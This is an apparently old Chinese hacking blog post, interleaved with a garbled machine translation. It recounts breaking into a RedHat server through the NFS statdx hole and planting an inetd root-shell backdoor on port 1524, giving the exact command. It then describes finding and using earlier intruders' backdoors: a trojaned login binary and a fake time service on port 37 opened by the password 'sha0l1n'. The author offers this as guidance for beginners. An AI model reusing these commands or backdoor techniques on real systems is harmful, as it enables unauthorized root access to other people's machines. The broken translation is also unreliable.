Sinbad Sinbad
以前发现了一台RedHat主机,看看网站的内容/程序还不错,于是通过NFS的那个statdx漏洞进去转了转,时间差不多了想做个后门就走人。 Previously found a RedHat host, take a look at the contents of the site / program is also good, so that over NFS rolled into statdx vulnerability, it is almost time to be a back door to walk away. 偶习惯了用cat>来输入源程序,但这次一按ctrl+d,就退出了kshell。 Even used to use cat> to enter the source, but this time a press ctrl + d, quit kshell. 继续尝试那个漏洞,已经connection refused,看来NFS服务翘掉了。 Continue to try that loophole has connection refused, it seems NFS service Alice out.
过了几个小时,干完其他活准备收工退出Netterm,想起来statdx,又试了一把,居然进去了,uptime一看,原来机器刚刚重新启动过。 After a few hours, I did knock out other activities to prepare Netterm, think of it statdx, and try one, actually go in, uptime, saw that it had just restarted the machine. 好,这次可不能轻易的退出shell了。 Well, this can not easily exit the shell of the.
模仿rpc.cmsd的exploit中一段,生成类似/etc/inetd.conf中一条纪录的文件: Rpc.cmsd the exploit in a mimic, to generate a similar / etc / inetd.conf file in a record:
bash# echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob bash # echo 'ingreslock stream tcp nowait root / bin / sh sh-i'> / tmp / bob
用inetd把rootshell绑定在ingreslock的1524端口: Rootshell with inetd to bind the 1524 port in ingreslock:
bash# /usr/sbin/inetd /tmp/bob bash # / usr / sbin / inetd / tmp / bob
嗯,看来比较幸运,/etc/services中的ingreslock没有被注释掉。 Ah, it seems more fortunate, / etc / services in the ingreslock not commented out.
$ telnet www.victim.com 1524 $ Telnet www.victim.com 1524
Trying 1.1.1.1... Trying 1.1.1.1 ...
Connected to www.victim.com. Connected to www.victim.com.
Escape character is '^]'. Escape character is'^]'.
bash# bash #
看看进程先: First look at the process:
bash# ps -ef bash # ps-ef
ps -ef ps-ef
PID TTY STAT TIME COMMAND PID TTY STAT TIME COMMAND
573 1 S 0:00 /sbin/mingetty tty1 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 573 1 S 0:00 / sbin / mingetty tty1 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
574 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 574 2 S 0:00 / sbin / mingetty tty2 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
575 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 575 3 S 0:00 / sbin / mingetty tty3 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
576 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 576 4 S 0:00 / sbin / mingetty tty4 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
577 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 577 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
578 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO 578 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
bash# bash #
怎么是这种输出? How is this output? 看来ps有问题,用RPM校验一下看看: Ps seems to have problems, check to see what an RPM:
bash# rpm -V `rpm -qf /bin/ps` bash # rpm-V `rpm-qf / bin / ps`
rpm -V `rpm -qf /bin/ps` rpm-V `rpm-qf / bin / ps`
Cannot expand ~/.rpmrc Cannot expand ~ /. Rpmrc
Cannot expand ~/.rpmrc Cannot expand ~ /. Rpmrc
呵呵,有问题? Oh, there is the problem? 检查一下login文件: Check the login file:
bash# strings /bin/login bash # strings / bin / login
/lib/ld-linux.so.2 / Lib/ld-linux.so.2
__gmon_start__ __gmon_start__
libcrypt.so.1 libcrypt.so.1
crypt crypt
libc.so.6 libc.so.6
getenv getenv
execl execl
putenv putenv
__deregister_frame_info __deregister_frame_info
strncpy strncpy
execv execv
strcmp strcmp
_IO_stdin_used _IO_stdin_used
__libc_start_main __libc_start_main
__register_frame_info __register_frame_info
GLIBC_2.0 GLIBC_2.0
PTRh< PTRh <
tJjchy tJjchy
TERM=vt100 TERM = vt100
/bin/sh / Bin / sh
DISPLAY DISPLAY
pLhwaT1xtzfds pLhwaT1xtzfds
/usr/bin/xlogin / Usr / bin / xlogin
注意到了没有? Noticed yet? pLhwaT1xtzfds应该就是加密过的密码,它长的就像吗。 pLhwaT1xtzfds should be the encrypted password, it long like you.
如果想解出密码,利用别人做好的这个后门,可以参考我以前的一篇“加密login后门中的密码”,主要是关于crypt()函数的内容。 If you want to solve the password, use other people to do this back door, you can refer to my previous article entitled "encrypted password in the login backdoor", mainly on the crypt () function of the content.
比较一下替换过的login和原来的login: Compare replaced over the original login and login:
bash# ls -l /bin/login /usr/bin/xlogin bash # ls-l / bin / login / usr / bin / xlogin
ls -l /bin/login /usr/bin/xlogin ls-l / bin / login / usr / bin / xlogin
-rwsr-xr-x 1 root root 20164 Apr 17 1999 /bin/login -Rwsr-xr-x 1 root root 20164 Apr 17 1999 / bin / login
-rwsr-xr-x 1 root root 20164 Oct 9 16:51 /usr/bin/xlogin -Rwsr-xr-x 1 root root 20164 Oct 9 16:51 / usr / bin / xlogin
文件大小一样,看来那黑客专门作过修正了,可惜时间没修改过来。 File size the same, it seems that the hacker was amended specifically, and unfortunately did not change over time. 这样,一般的系统管理员通过find命令也会发现其中的异常。 Thus, the general system administrators find command will find one of the exceptions.
既然到了这一步:由入侵变成了入侵检测,那就再看看罗。 As to this point: the invasion into the intrusion detection, it would look Luo.
看看inetd起了哪些服务: To see what services from inetd:
bash# grep -v "^#" /etc/inetd.conf bash # grep-v "^ #" / etc / inetd.conf
grep -v "^#" /etc/inetd.conf grep-v "^ #" / etc / inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a ftp stream tcp nowait root / usr / sbin / tcpd in.ftpd-l-a
login stream tcp nowait root /usr/sbin/tcpd in.rlogind login stream tcp nowait root / usr / sbin / tcpd in.rlogind
time stream tcp nowait root /usr/sbin/time in.timed time stream tcp nowait root / usr / sbin / time in.timed
time dgram udp wait root /usr/sbin/time in.timed time dgram udp wait root / usr / sbin / time in.timed
注意到没有,又有不正常的地方了。 Noticed, there is not a normal place. time应该是internal的,而在这里却是用了/usr/sbin/ time should be internal, but here it is with the / usr / sbin /
time来处理请求,十之八九又是一个后门。 time to process the request, most likely is a back door.
bash# strings /usr/sbin/time bash # strings / usr / sbin / time
strings /usr/sbin/time strings / usr / sbin / time
/lib/ld-linux.so.2 / Lib/ld-linux.so.2
__gmon_start__ __gmon_start__
libc.so.6 libc.so.6
fgets fgets
system system
__deregister_frame_info __deregister_frame_info
stdin stdin
sscanf sscanf
_IO_stdin_used _IO_stdin_used
__libc_start_main __libc_start_main
__register_frame_info __register_frame_info
GLIBC_2.0 GLIBC_2.0
PTRh PTRh
QVhX QVhX
hWVS hWVS
sha0l1n sha0l1n
/bin/sh -i / Bin / sh-i
呵呵,这次的密码没有加密,应该是sha0l1n吧。 Oh, this password is not encrypted, it should be sha0l1n it. 看来不是做login后门那个人搞的。 It does not seem to do login backdoor that person did it.
我们登录上time的37端口看看: We logged 37 ports on the time to see:
$ telnet www.victim.com 37 $ Telnet www.victim.com 37
Trying 1.1.1.1... Trying 1.1.1.1 ...
Connected to www.victim.com. Connected to www.victim.com.
Escape character is '^]'. Escape character is'^]'.
sha0l1n sha0l1n
bash# bash #
果然如此。 Really the case. 。 . 。 .
这台机器真够倒霉的,不同的人进来后都装了不同的后门。 This machine really is bad, different people come in after they installed a different door. 如果都像偶这样仔细分析分析,明白“前人栽树,后人乘凉”的道理,就不用白费时间做后门啦。 Even if you are as careful analysis of this analysis, to understand "the consequence of planting trees, descendants cool," the truth, do not waste time to do the back door friends.
这篇文章中提到的方法都很简单,希望给初级读者提供一个指导性的内容。 The methods mentioned in this article are very simple, I hope to provide readers with a primary guiding content.
有任何错误的提法,请在Feedback版中留言,谢谢。 Reference to any errors, please leave a message in the Feedback version, thank you.
Tidak ada komentar:
Posting Komentar